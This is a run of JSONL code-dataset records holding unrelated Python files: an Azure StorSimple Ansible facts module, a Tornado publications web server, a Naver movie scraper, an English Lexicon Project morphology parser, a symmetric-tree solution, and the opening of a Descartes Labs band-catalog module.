\"/subscriptions/9eb689cd-7243-43b4-b6f6-5c65cb296641/resourceGroups/ResourceGroupForSDKTest/providers/Microsoft.StorSimple/managers/hAzur\n eSDKOperations/devices/HSDK-ARCSX4MVKZ\"\n name:\n description:\n - The name.\n returned: always\n type: str\n sample: HSDK-ARCSX4MVKZ\n culture:\n description:\n - \"Language culture setting on the device. For eg: 'en-US'\"\n returned: always\n type: str\n sample: en-US\n status:\n description:\n - \"Current status of the device. Possible values include: 'Unknown', 'Online', 'Offline', 'RequiresAttention', 'MaintenanceMode',\n 'Creating', 'Provisioning', 'Deleted', 'ReadyToSetup', 'Deactivated', 'Deactivating'\"\n returned: always\n type: str\n sample: Online\n'''\n\nfrom ansible.module_utils.azure_rm_common import AzureRMModuleBase\n\ntry:\n from msrestazure.azure_exceptions import CloudError\n from azure.mgmt.storsimple import StorSimpleManagementClient\n from msrest.serialization import Model\nexcept ImportError:\n # This is handled in azure_rm_common\n pass\n\n\nclass AzureRMDeviceFacts(AzureRMModuleBase):\n def __init__(self):\n # define user inputs into argument\n self.module_arg_spec = dict(\n device_name=dict(\n type='str'\n ),\n resource_group=dict(\n type='str',\n required=True\n ),\n name=dict(\n type='str',\n required=True\n ),\n expand=dict(\n type='str'\n )\n )\n # store the results of the module operation\n self.results = dict(\n changed=False\n )\n self.mgmt_client = None\n self.device_name = None\n self.resource_group = None\n self.name = None\n self.expand = None\n super(AzureRMDeviceFacts, self).__init__(self.module_arg_spec, supports_tags=False)\n\n def exec_module(self, **kwargs):\n for key in self.module_arg_spec:\n setattr(self, key, kwargs[key])\n self.mgmt_client = self.get_mgmt_svc_client(StorSimpleManagementClient,\n base_url=self._cloud_environment.endpoints.resource_manager)\n\n if self.device_name is not None:\n self.results['devices'] = self.get()\n else:\n self.results['devices'] = self.list_by_manager()\n return self.results\n\n def get(self):\n response = None\n results = []\n try:\n response = self.mgmt_client.devices.get(device_name=self.device_name,\n resource_group_name=self.resource_group,\n manager_name=self.name)\n self.log(\"Response : {0}\".format(response))\n except CloudError as e:\n self.log('Could not get facts for Device.')\n\n if response is not None:\n results.append(self.format_response(response))\n\n return results\n\n def list_by_manager(self):\n response = None\n results = []\n try:\n response = self.mgmt_client.devices.list_by_manager(resource_group_name=self.resource_group,\n manager_name=self.name)\n self.log(\"Response : {0}\".format(response))\n except CloudError as e:\n self.log('Could not get facts for Device.')\n\n if response is not None:\n for item in response:\n results.append(self.format_response(item))\n\n return results\n\n def format_response(self, item):\n d = item.as_dict()\n d = {\n 'resource_group': self.resource_group,\n 'id': d.get('id', None),\n 'name': d.get('name', None),\n 'culture': d.get('culture', None),\n 'status': d.get('status', None)\n }\n return d\n\n\ndef main():\n AzureRMDeviceFacts()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"library/azure_rm_storsimpledevice_facts.py","file_name":"azure_rm_storsimpledevice_facts.py","file_ext":"py","file_size_in_byte":5895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"7854492","text":"#!/usr/bin/python2\n\"Web application server for a simple publications database.\"\n\nfrom __future__ import print_function\n\nimport logging\nimport os\n\nimport tornado.web\nimport tornado.ioloop\n\nfrom publications import settings\nfrom publications import uimodules\nfrom publications import utils\nfrom publications.requesthandler import RequestHandler\n\nfrom publications.home import (Home,\n Contact)\nfrom publications.login import (Login,\n Logout)\nfrom publications.account import (Account,\n AccountJson,\n Accounts,\n AccountsJson,\n AccountAdd,\n AccountEdit,\n AccountReset,\n AccountPassword,\n AccountDisable,\n AccountEnable)\nfrom publications.publication import (Publication,\n PublicationJson,\n Publications,\n PublicationsTable,\n PublicationsJson,\n PublicationsCsv,\n PublicationsUnverified,\n PublicationVerify,\n PublicationsNoPmid,\n PublicationsNoDoi,\n PublicationsModified,\n PublicationAdd,\n PublicationFetch,\n PublicationEdit,\n PublicationBlacklist)\nfrom publications.journal import (Journal,\n JournalJson,\n JournalEdit,\n Journals,\n JournalsJson)\nfrom publications.label import (Label,\n LabelJson,\n LabelsList,\n LabelsTable,\n LabelsJson,\n LabelAdd,\n LabelEdit,\n LabelMerge)\nfrom publications.search import (Search,\n SearchJson)\nfrom publications.logs import Logs\n\n\ndef get_args():\n parser = utils.get_command_line_parser(description=\n 'Publications web server')\n parser.add_argument('-p', '--pidfile',\n action='store', dest='pidfile', default=None,\n metavar=\"FILE\", help=\"filename of file containing PID\")\n return parser.parse_args()\n\ndef main():\n args = get_args()\n utils.load_settings(filepath=args.settings)\n\n url = tornado.web.url\n handlers = [url(r'/', Home, name='home'),\n url(r'/site/([^/]+)', tornado.web.StaticFileHandler,\n {'path': settings['SITE_DIR']}, name='site'),\n url(r'/publication/([^/.]+)', Publication, name='publication'),\n url(r'/publication/([^/.]+).json',\n PublicationJson, name='publication_json'),\n url(r'/publications/(\\d{4})',\n Publications, name='publications_year'),\n url(r'/publications/(\\d{4}).json',\n PublicationsJson, name='publications_year_json'),\n url(r'/publications', Publications, name='publications'),\n url(r'/publications.json', \n PublicationsJson, name='publications_json'),\n url(r'/publications/csv', \n PublicationsCsv, name='publications_csv'),\n url(r'/publications/table/(\\d{4})',\n PublicationsTable, name='publications_table_year'),\n url(r'/publications/table',\n PublicationsTable, name='publications_table'),\n url(r'/publications/unverified',\n PublicationsUnverified, name='publications_unverified'),\n url(r'/verify/([^/]+)',\n PublicationVerify, name='publication_verify'),\n url(r'/publications/no_pmid',\n PublicationsNoPmid, name='publications_no_pmid'),\n url(r'/publications/no_doi',\n PublicationsNoDoi, name='publications_no_doi'),\n url(r'/publications/modified',\n PublicationsModified, name='publications_modified'),\n url(r'/edit/([^/]+)',\n PublicationEdit, name='publication_edit'),\n url(r'/add',\n PublicationAdd, name='publication_add'),\n url(r'/fetch',\n PublicationFetch, name='publication_fetch'),\n url(r'/blacklist/([^/]+)',\n PublicationBlacklist, name='publication_blacklist'),\n url(r'/journals', Journals, name='journals'),\n url(r'/journals.json', JournalsJson, name='journals_json'),\n url(r'/journal/([^/]+).json', JournalJson,name='journal_json'),\n url(r'/journal/([^/]+)', Journal, name='journal'),\n url(r'/journal/([^/]+)/edit', JournalEdit,name='journal_edit'),\n url(r'/labels', LabelsList, name='labels'),\n url(r'/labels.json', LabelsJson, name='labels_json'),\n url(r'/labels/table', LabelsTable, name='labels_table'),\n url(r'/label/([^/.]+).json', LabelJson, name='label_json'),\n url(r'/label/([^/.]+)', Label, name='label'),\n url(r'/label', LabelAdd, name='label_add'),\n url(r'/label/([^/]+)/edit', LabelEdit, name='label_edit'),\n url(r'/label/([^/]+)/merge', LabelMerge, name='label_merge'),\n url(r'/account/reset', AccountReset, name='account_reset'),\n url(r'/account/password',\n AccountPassword, name='account_password'),\n url(r'/account/([^/]+).json', AccountJson,name='account_json'),\n url(r'/account/([^/]+)', Account, name='account'),\n url(r'/account/([^/]+)/edit',\n AccountEdit, name='account_edit'),\n url(r'/account/([^/]+)/disable',\n AccountDisable, name='account_disable'),\n url(r'/account/([^/]+)/enable',\n AccountEnable, name='account_enable'),\n url(r'/accounts', Accounts, name='accounts'),\n url(r'/accounts.json', AccountsJson, name='accounts_json'),\n url(r'/account', AccountAdd, name='account_add'),\n url(r'/search', Search, name='search'),\n url(r'/search.json', SearchJson, name='search_json'),\n url(r'/logs/([^/]+)', Logs, name='logs'),\n url(r'/contact', Contact, name='contact'),\n url(r'/login', Login, name='login'),\n url(r'/logout', Logout, name='logout'),\n ]\n\n os.chdir(settings['ROOT'])\n application = tornado.web.Application(\n handlers=handlers,\n debug=settings.get('TORNADO_DEBUG', False),\n cookie_secret=settings['COOKIE_SECRET'],\n xsrf_cookies=True,\n ui_modules=uimodules,\n template_path='html',\n static_path='static',\n login_url=r'/login')\n application.listen(settings['PORT'], xheaders=True)\n pid = os.getpid()\n logging.info(\"web server PID %s at %s\", pid, settings['BASE_URL'])\n if args.pidfile:\n with open(args.pidfile, 'w') as pf:\n pf.write(str(pid))\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"publications/app_publications.py","file_name":"app_publications.py","file_ext":"py","file_size_in_byte":7885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"232717659","text":"ESCAPE_CHARS = {\r\n \"dash\": b'\\xe2\\x80\\x93'.decode(),\r\n \"dash2\": b\"\\xe2\\x80\\x94\".decode(),\r\n \"quote\": b'\\xe2\\x80\\x99'.decode(),\r\n \"double-quote\": b'\\xe2\\x80\\x98'.decode(),\r\n \"double-quote-open\": b\"\\xe2\\x80\\x9c\".decode(),\r\n \"double-quote-close\": b\"\\xe2\\x80\\x9d\".decode(),\r\n \"e\": b\"\\xc3\\xa8\".decode(),\r\n \"e2\": b\"\\xc3\\xa9\".decode(),\r\n \"unknown\": b\"\\xc2\\xad\".decode(),\r\n \"unknown2\": b\"\\x0b\".decode(),\r\n \"copy\": b\"\\xc2\\xa9\".decode()\r\n}\r\n","sub_path":"string_test.py","file_name":"string_test.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"503039495","text":"import sys, getopt\n\ndef fibonacy(n):\n\tstack = [0, 1]\n\tresult = 1\n\tfor i in range(n-1):\n\t\tlast = stack.pop()\n\t\tpre_last = stack.pop()\n\t\tresult = last + pre_last\n\t\tstack.append(last)\n\t\tstack.append(result)\n\treturn result\n\ntry:\n\topts, args = getopt.getopt(sys.argv[1:], \"n:\")\nexcept getopt.GetoptError:\n\tprint(\"usage: python3 program.py -n \")\n\tsys.exit(2)\n\nn = 1\nfor opt, arg in opts:\n\tif opt == '-n':\n\t\tn = int(arg)\n\nprint(\"compute fibonacy at \" + str(n) + \" position:\")\nresult = fibonacy(n)\nprint(result)\n","sub_path":"fibonacy_stack/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"94816816","text":"import pandas as pd\r\nimport numpy as np\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\n\r\n# 네이버 영화 url\r\nurl = \"https://movie.naver.com/movie/running/premovie.nhn\"\r\n# requests 요청\r\nresponse = requests.get(url)\r\n# 응답 확인\r\nresponse\r\n# 해당 text를 html로 변환\r\nhtml = BeautifulSoup(response.text,\"html.parser\")\r\n# 특정 태그 선택\r\ndata = html.select('div.obj_section div.lst_wrap ul.lst_detail_t1 li')\r\nnames = [] # 영화 제목\r\ndirectors = [] # 영화 감독명\r\nactors = [] # 영화 배우명\r\nratings = [] # 영화 관람등급\r\ngenres = [] # 영화 장르\r\ntimes = [] # 영화 상영시간\r\nrelease_dates = [] # 영화 개봉예정일\r\nanticipate_up = [] # 기대지수 UP\r\nanticipate_down = [] # 기대지수 DOWN\r\n\r\nfor item in data:\r\n # 각 컬럼별 태그 위치를 찾아서 리스트에 추가, 없다면 결측치 입력\r\n try:\r\n names.append(item.select('dl.lst_dsc dt.tit a')[0].text.strip())\r\n except IndexError:\r\n names.append(None)\r\n try:\r\n directors.append(re.sub('[\\r\\t\\n]','',item.select('dl.lst_dsc dl.info_txt1 dd')[1].text.strip()))\r\n except IndexError:\r\n directors.append(None)\r\n try:\r\n actors.append(re.sub('[\\r\\t\\n]','',item.select('dl.lst_dsc dl.info_txt1 dd')[2].text.strip()))\r\n except IndexError:\r\n actors.append(None)\r\n try:\r\n ratings.append(item.select('dl.lst_dsc dt.tit span')[0].text.strip())\r\n except IndexError:\r\n ratings.append(None)\r\n try:\r\n genre = item.select('dl.lst_dsc dl.info_txt1 dd')[0].select('a')[0].text.strip()\r\n if len(item.select('dl.lst_dsc dl.info_txt1 dd')[0].select('a')) > 1:\r\n for i in item.select('dl.lst_dsc dl.info_txt1 dd')[0].select('a')[1:]:\r\n genre += f', {i.text.strip()}'\r\n genres.append(genre)\r\n except IndexError:\r\n genres.append(None)\r\n try:\r\n star = item.select('dl.lst_dsc dd.star dl.info_exp em')\r\n anticipate_up.append(star[0].text.strip())\r\n anticipate_down.append(star[1].text.strip())\r\n except IndexError:\r\n anticipate_up.append(None)\r\n anticipate_down.append(None)\r\n instance = re.sub('[\\r\\t\\n]','',item.select('dl.info_txt1 dd')[0].text.strip()).split('|')\r\n tflag = False\r\n rflag = False\r\n for i in instance:\r\n if '분' in i:\r\n times.append(i.replace(\"분\",\"\"))\r\n tflag = True\r\n elif '개봉' in i:\r\n release_dates.append(i.replace(\"개봉\",\"\").strip())\r\n rflag = True\r\n else :\r\n continue\r\n if tflag == False :\r\n times.append(None)\r\n if rflag == False:\r\n release_dates.append(None)\r\n# 데이터 프레임 생성\r\ndf = pd.DataFrame(columns=['Name','Director','Actor','Rating','Genre','Time','Release Date'])\r\ndf['Name'] = names\r\ndf['Director'] = directors\r\ndf['Actor'] = actors\r\ndf['Rating'] = ratings\r\ndf['Genre'] = genres\r\ndf['Time'] = times\r\ndf['Release Date'] = release_dates\r\ndf['anticipate Up'] = anticipate_up\r\ndf['anticipate Down'] = anticipate_down\r\n# 기대지수가 없는 경우(재개봉)를 제외한 새로운 데이터프레임 생성\r\ndf2 = df.dropna(subset=['anticipate Up'])\r\n# 인덱스 재지정 및 삭제\r\ndf2.reset_index(inplace=True)\r\ndel df2['index']\r\n\r\ndf.to_csv('./movie_final.csv',encoding='utf-8-sig')\r\ndf2.to_csv('./movies_2.csv',encoding='utf-8-sig')","sub_path":"movie_crawaler.py","file_name":"movie_crawaler.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"179968561","text":"\"\"\"Classes for representing items in the English Lexicon Project database.\"\"\"\n\n# Copyright (C) 2011-2013 Constantine Lignos\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport re\nfrom collections import defaultdict\nfrom operator import attrgetter\n\n\nNULL = \" \"\nMISANALYSIS_MARKER = \"--\"\nANALYSIS_RE = re.compile(r'^(.+<)*-?(\\{.+\\})(>.+)*$')\nSEP_RE = re.compile(r'[<>{}]+')\n\n_INFLECTIONAL_SUFFIXES = set(('s', 'ed', 'ing'))\nSUFFIX_COMPOUNDS = set((\n \"woman\",\n \"women\",\n \"man\",\n \"men\",\n \"land\",\n # What about ship? (showmanship, brinksmanship)\n))\nSUFFIX_MERGES = {\n 'ible': '*ble',\n 'able': '*ble',\n 'er': '*r',\n 'or': '*r',\n 'ance': '*nce',\n 'ence': '*nce',\n # -ant/-ent both have the same N/Adj syncretic forms:\n # combat-ant (N/Adj), depend-ent (N/Adj)\n 'ant': '*nt',\n 'ent': '*nt',\n # ELP standardized on 'ise', but there's one mistaken 'ize'\n 'ize': 'ise',\n}\nEXCLUDED_SUFFIXES = set((\n \"n't\",\n \"'s\",\n \"'d\",\n \"'ll\",\n \"'ve\",\n \"'t\",\n \"'m\",\n \"'re\",\n # Cannot distinguish between magic>ian> and Corinth>ian>,\n # suburb-an and Rome-an\n 'ian',\n 'an',\n # Cannot distinguish -en forms (blown) from (Californian). This\n # could be fixed by knowing irregulars, but other forms may have\n # some of the -ian/-an problems.\n 'n',\n))\nBAD_SUFFIXES = SUFFIX_COMPOUNDS | EXCLUDED_SUFFIXES\n# Some things to think about further:\n# ate_1/ate_2: fabricate, obstinate, use pron to tell these apart?\nNULL_AFFIX = \" \"\n\n\nclass AnalysisParseError(Exception):\n \"\"\"An analysis string could not be parsed.\"\"\"\n pass\n\n\nclass Lexicon(dict):\n \"\"\"Dictionary-based class to hold all words\"\"\"\n\n def __init__(self):\n \"\"\"Create empty frequency tables at initialization.\"\"\"\n self.suffix_freqs_hal = defaultdict(int)\n self.suffix_freqs_kf = defaultdict(int)\n self.suffix_freqs_sbtlx = defaultdict(int)\n self.suffix_freqs_celex = defaultdict(int)\n self.base_freqs_hal = defaultdict(int)\n self.base_freqs_kf = defaultdict(int)\n self.base_freqs_sbtlx = defaultdict(int)\n self.base_freqs_celex = defaultdict(int)\n self.base_suffixprobs = defaultdict(lambda: defaultdict(int))\n # Words sharing an inflection\n self.inflect_sets = defaultdict(set)\n # Words sharing a root\n self.root_sets = defaultdict(set)\n # Track ranks, for now assuming there is just one frequency measure to compute this over.\n self.word_ranks = {}\n self.base_ranks = {}\n # Base init\n dict.__init__(self)\n\n def compute_freqs(self):\n \"\"\"Compute base and suffix frequencies in the lexicon.\"\"\"\n # Add up frequencies and build inflection and derivational lemmas\n for word in self.values():\n # Count all suffixes\n if word.suffixes:\n for suffix in word.suffixes:\n self.suffix_freqs_hal[suffix] += word.freq_hal\n self.suffix_freqs_kf[suffix] += word.freq_kf\n self.suffix_freqs_sbtlx[suffix] += word.freq_sbtlx\n self.suffix_freqs_celex[suffix] += word.freq_celex\n\n self.base_freqs_hal[word.root] += word.freq_hal\n self.base_freqs_kf[word.root] += word.freq_kf\n self.base_freqs_sbtlx[word.root] += word.freq_sbtlx\n self.base_freqs_celex[word.root] += word.freq_celex\n\n # Exclude derived words, fake words, and proper nouns from inflectional sets\n if not (word.derivational or word.fake or word.text[0].isupper()):\n # Add to inflection and root sets\n self.root_sets[word.root].add(word.text)\n self.inflect_sets[word.root].add(word.text)\n # Always throw in the root too\n self.inflect_sets[word.root].add(word.root)\n\n def compute_ranks(self):\n \"\"\"Compute ranks of words, bases, and words within each base.\"\"\"\n # Extract words and bases with their frequencies\n self.word_ranks = {word.text: (idx + 1) for idx, word in\n enumerate(sorted(self.values(), key=attrgetter('freq_sbtlx'),\n reverse=True))}\n self.base_ranks = {root: (idx + 1) for idx, root in\n enumerate(sorted(self.base_freqs_sbtlx, key=self.base_freqs_sbtlx.get,\n reverse=True))}\n\n def word_rank(self, word):\n \"\"\"Return the rank of a word.\"\"\"\n return self.word_ranks[word.text] if word.text in self.word_ranks else None\n\n def base_rank(self, base):\n \"\"\"Return the rank of a base.\"\"\"\n return self.base_ranks[base] if base in self.base_ranks else None\n\n def base_freq_hal(self, base):\n \"\"\"Return the frequency of a base using HAL.\"\"\"\n # Since it's a defaultdict, do an explicit check\n return self.base_freqs_hal[base] if base in self.base_freqs_hal else None\n\n def base_freq_kf(self, base):\n \"\"\"Return the frequency of a base using KF.\"\"\"\n # Since it's a defaultdict, do an explicit check\n return self.base_freqs_kf[base] if base in self.base_freqs_kf else None\n\n def base_freq_sbtlx(self, base):\n \"\"\"Return the frequency of a base using SUBTLEX.\"\"\"\n # Since it's a defaultdict, do an explicit check\n return self.base_freqs_sbtlx[base] if base in self.base_freqs_sbtlx else None\n\n def base_freq_celex(self, base):\n \"\"\"Return the frequency of a base using CELEX.\"\"\"\n # Since it's a defaultdict, do an explicit check\n return self.base_freqs_celex[base] if base in self.base_freqs_celex else None\n\n def suffix_freq_hal(self, suffix):\n \"\"\"Return the frequency of a suffix using HAL.\"\"\"\n return self.suffix_freqs_hal[suffix]\n\n def suffix_freq_kf(self, suffix):\n \"\"\"Return the frequency of a suffix using KF.\"\"\"\n return self.suffix_freqs_kf[suffix]\n\n def suffix_freq_sbtlx(self, suffix):\n \"\"\"Return the frequency of a suffix using SUBTLEX.\"\"\"\n return self.suffix_freqs_sbtlx[suffix]\n\n def suffix_freq_celex(self, suffix):\n \"\"\"Return the frequency of a suffix using CELEX.\"\"\"\n return self.suffix_freqs_celex[suffix]\n\n def p_form_base_hal(self, word):\n \"\"\"Return the probability of the word form within its base.\"\"\"\n # Check for non-zero frequency\n return (word.freq_hal / float(self.base_freqs_hal[word.root])\n if self.base_freqs_hal[word.root] else None)\n\n def p_form_base_kf(self, word):\n \"\"\"Return the probability of the word form within its base.\"\"\"\n # Check for non-zero frequency\n return (word.freq_kf / float(self.base_freqs_kf[word.root])\n if self.base_freqs_kf[word.root] else None)\n\n def p_form_base_sbtlx(self, word):\n \"\"\"Return the probability of the word form within its base.\"\"\"\n # Check for non-zero frequency\n return (word.freq_sbtlx / float(self.base_freqs_sbtlx[word.root])\n if self.base_freqs_sbtlx[word.root] else None)\n\n def p_form_base_celex(self, word):\n \"\"\"Return the probability of the word form within its base.\"\"\"\n # Check for non-zero frequency\n return (word.freq_celex / float(self.base_freqs_celex[word.root])\n if self.base_freqs_celex[word.root] else None)\n\n def freq_greater_root_sbtlx(self, word):\n \"\"\"Return whether word is more freq. than root, None if it's the root or has no freq.\"\"\"\n try:\n if word.text == word.root or not word.freq_sbtlx or not self[word.root].freq_sbtlx:\n return None\n return word.freq_sbtlx > self[word.root].freq_sbtlx\n except KeyError:\n return None\n\n\nclass Word(object):\n \"\"\"Representation of data for a word, including frequency and RT data.\"\"\"\n __slots__ = (\"text\", \"length\", \"freq_hal\", \"freq_kf\", \"freq_sbtlx\", \"freq_celex\",\n \"prefixes\", \"suffixes\", \"root\", \"inflectional\", \"derivational\", \"analysis\",\n \"nphon\", \"nsyll\", \"fake\")\n\n def __init__(self, text, length, freq_hal, freq_kf, freq_sbtlx, freq_celex, analysis,\n nphon, nsyll, fake=False):\n \"\"\"Set basic information about the word and parse the analysis.\"\"\"\n self.text = text\n self.length = length\n self.freq_kf = freq_kf\n self.freq_hal = freq_hal\n self.freq_sbtlx = freq_sbtlx\n self.freq_celex = freq_celex\n self.nphon = nphon\n self.nsyll = nsyll\n self.fake = fake\n\n # This may raise a AnalysisParseError, which is passed on to the caller.\n self.prefixes, roots, self.suffixes = parse_analysis(analysis)\n # If there's more than one root, we can't make use of this\n if len(roots) > 1:\n raise AnalysisParseError(\"Compound forms are excluded\")\n else:\n self.root = roots[0]\n\n # Store the updated analysis\n self.analysis = format_analysis(self.prefixes, [self.root], self.suffixes)\n\n # Mark inflectional/derivational\n self.inflectional = self.derivational = False\n if self.suffixes:\n if self.suffixes[-1] in _INFLECTIONAL_SUFFIXES:\n self.inflectional = True\n # If it's inflected but also has more than one suffix\n # or has any prefixes, mark derivational.\n if len(self.suffixes) > 1 or self.prefixes:\n self.derivational = True\n else:\n self.derivational = True\n elif self.prefixes:\n self.derivational = True\n\n def __len__(self):\n return len(self.text)\n\n def __str__(self):\n return self.text\n\n def __repr__(self):\n return \"\"\n\n\ndef parse_word(adict):\n \"\"\"Parse a word from a dict of the ELP fields for the word.\"\"\"\n if adict['MorphSp'] == \"NULL\":\n return None\n else:\n # Clean up the KF frequency, putting zero where needed\n if adict['Freq_KF'] == \"NULL\":\n adict['Freq_KF'] = 0\n\n # Catch any parsing errors by returning None\n try:\n # Put in None for the SUBTLEX/CELEX frequency as we can't get it out of the ELP data\n return Word(adict['Word'], adict['Length'], int(adict['Freq_HAL']),\n int(adict['Freq_KF']), None, None, adict['MorphSp'],\n adict['NPhon'], adict['NSyll'])\n except AnalysisParseError:\n return None\n\n\ndef _correct_suffixes(roots, suffixes):\n \"\"\"Return (roots, suffixes) with better analyses, possibly modifying the originals.\"\"\"\n\n # If we find one of these at the start of suffixes, they can\n # easily be moved into the roots.\n if suffixes[0] in SUFFIX_COMPOUNDS:\n roots.append(suffixes.pop(0))\n\n # Merge suffixes that need it\n suffixes = [SUFFIX_MERGES.get(suffix, suffix) for suffix in suffixes]\n\n return roots, suffixes\n\n\ndef _exclude_analysis(prefixes, roots, suffixes): # pylint: disable=W0613\n \"Return whether we should exclude an analysis.\"\"\"\n # Some of the men/women compounds can't easily be fixed. For\n # example, fixing {sport}>s>>men> would make {sport}>s>{men},\n # which violates the ELP coding, which requires that affixes\n # be completely outside all roots.\n if suffixes and any(suffix in BAD_SUFFIXES for suffix in suffixes):\n return True\n\n return False\n\n\ndef parse_analysis(analysis):\n \"\"\"Parse a morphological analyses into lists of morphs.\"\"\"\n # Parse out prefixes, roots, and suffixes. Roots will not be None,\n # but prefixes and suffixes might be.\n try:\n prefixes, roots, suffixes = ANALYSIS_RE.match(analysis).groups()\n except AttributeError:\n # No match\n raise AnalysisParseError(\"Could not match analysis {} to regex\".format(analysis))\n\n prefixes = ([item for item in SEP_RE.split(prefixes) if item]\n if prefixes else None)\n suffixes = ([item for item in SEP_RE.split(suffixes) if item]\n if suffixes else None)\n roots = [item.replace(MISANALYSIS_MARKER, '')\n for item in SEP_RE.split(roots) if item]\n\n # Correct analyses as needed\n if suffixes:\n roots, suffixes = _correct_suffixes(roots, suffixes)\n\n # Throw out ones we just cannot handle\n if _exclude_analysis(prefixes, roots, suffixes):\n raise AnalysisParseError(\"Analysis {} meets exclusion criteria\".format(analysis))\n\n return (prefixes, roots, suffixes)\n\n\ndef format_analysis(prefixes, roots, suffixes):\n \"\"\"Format an analysis in the ELP convention.\"\"\"\n prefix_str = (\"\".join(\"<{}<\".format(prefix) for prefix in prefixes) if prefixes else\n \"\")\n root_str = \"\".join(\"{{{}}}\".format(root) for root in roots)\n suffix_str = (\"\".join(\">{}>\".format(suffix) for suffix in suffixes) if suffixes else\n \"\")\n return \"\".join((prefix_str, root_str, suffix_str))\n\n\ndef morph_map(in_file):\n \"\"\"Return dicts of the relationships between morphs in in_file.\"\"\"\n prefix_words = defaultdict(set)\n root_words = defaultdict(set)\n suffix_words = defaultdict(set)\n\n for line in in_file:\n word, analysis = line.strip().split(',')\n try:\n prefixes, roots, suffixes = parse_analysis(analysis)\n except AnalysisParseError:\n # Skip forms we can't analyze\n continue\n\n # Skip compounds\n root = roots[0]\n if len(roots) > 1:\n continue\n\n # Store each morph\n root_words[root].add(word)\n for affixes, affix_words in ((prefixes, prefix_words), (suffixes, suffix_words)):\n if affixes:\n for affix in affixes:\n affix_words[affix].add(word)\n else:\n affix_words[NULL_AFFIX].add(word)\n\n return (prefix_words, root_words, suffix_words)\n","sub_path":"elp.py","file_name":"elp.py","file_ext":"py","file_size_in_byte":14540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"471081849","text":"from utils_py.tree import *\n\nclass Solution:\n def is_sym(self, l: TreeNode, r: TreeNode):\n if not l and not r:\n return True\n if not l or not r:\n return False\n\n if l.val != r.val:\n return False\n return self.is_sym(l.right, r.left) and self.is_sym(l.left, r.right)\n\n def isSymmetric(self, root: TreeNode) -> bool:\n if not root:\n return True\n return self.is_sym(root.left, root.right)\n\ndef test(test_name, root, expected):\n res = Solution().isSymmetric(root)\n if res == expected:\n print(test_name + ' success.')\n else:\n print(test_name + ' failed.')\n\n\nif __name__ == \"__main__\":\n #     1\n #    / \\\n #   2   2\n #  / \\ / \\\n # 3  4 4  3\n root1 = TreeNode(1)\n root1.left = TreeNode(2)\n root1.right = TreeNode(2)\n root1.left.left = TreeNode(3)\n root1.left.right = TreeNode(4)\n root1.right.left = TreeNode(4)\n root1.right.right = TreeNode(3)\n expected1 = True\n test('test1', root1, expected1)\n\n #     1\n #    / \\\n #   2   2\n #  / \\ / \\\n #  3  3\n root2 = TreeNode(1)\n root2.left = TreeNode(2)\n root2.right = TreeNode(2)\n root2.left.right = TreeNode(3)\n root2.right.right = TreeNode(3)\n expected2 = False\n test('test2', root2, expected2)\n\n root3 = None\n expected3 = True\n test('test3', root3, expected3)\n","sub_path":"of28_对称的二叉树/Solution1.py","file_name":"Solution1.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"57755411","text":"from enum import Enum\n\nfrom descarteslabs.common.property_filtering import GenericProperties\nfrom .catalog_base import CatalogObject\nfrom .named_catalog_base import NamedCatalogObject\nfrom .attributes import Attribute, EnumAttribute, Resolution\n\n\nproperties = GenericProperties()\n\n\nclass DataType(str, Enum):\n \"\"\"Valid data types for bands.\n\n Attributes\n ----------\n BYTE : enum\n An 8 bit unsigned integer value.\n UINT16 : enum\n A 16 bit unsigned integer value.\n INT16 : enum\n A 16 bit signed integer value.\n UINT32 : enum\n A 32 bit unsigned integer value.\n INT32 : enum\n A 32 bit signed integer value.\n FLOAT32 : enum\n A 32 bit single-precision floating-point format value.\n FLOAT64 : enum\n A 64 bit double-precision floating-point format value.\n \"\"\"\n\n BYTE = \"Byte\"\n UINT16 = \"UInt16\"\n INT16 = \"Int16\"\n UINT32 = \"UInt32\"\n INT32 = \"Int32\"\n FLOAT32 = \"Float32\"\n FLOAT64 = \"Float64\"\n\n\nclass BandType(str, Enum):\n \"\"\"Types of bands with different data interpretation.\n\n The type of band is represented in the specific Band class being used\n and is only for informative purposes.\n\n Attributes\n ----------\n CLASS : enum\n A band that maps a finite set of values that may not be continuous.\n SPECTRAL : enum\n A band that lies somewhere on the visible/NIR/SWIR electro-optical wavelength\n spectrum.\n MASK : enum\n A binary band where by convention a 0 means masked and 1 means non-masked.\n MICROWAVE : enum\n A band that lies in the microwave spectrum, often from SAR or passive radar\n sensors.\n GENERIC : enum\n An unspecified kind of band not fitting any other type.\n \"\"\"\n\n CLASS = \"class\"\n SPECTRAL = \"spectral\"\n MASK = \"mask\"\n MICROWAVE = \"microwave\"\n GENERIC = \"generic\"\n\n\nclass Band(NamedCatalogObject):\n \"\"\"A data band in images of a specific product.\n\n This is an abstract class that cannot be instantiated, but can be used for searching\n across all types of bands. The concrete bands are represented by the derived\n classes. To create a new band instantiate one of those specialized classes:\n\n * `SpectralBand`: A band that lies somewhere on the visible/NIR/SWIR electro-optical\n wavelength spectrum. Specific attributes:\n :attr:`~SpectralBand.wavelength_nm_center`,\n :attr:`~SpectralBand.wavelength_nm_min`,\n :attr:`~SpectralBand.wavelength_nm_max`,\n :attr:`~SpectralBand.wavelength_nm_fwhm`\n * 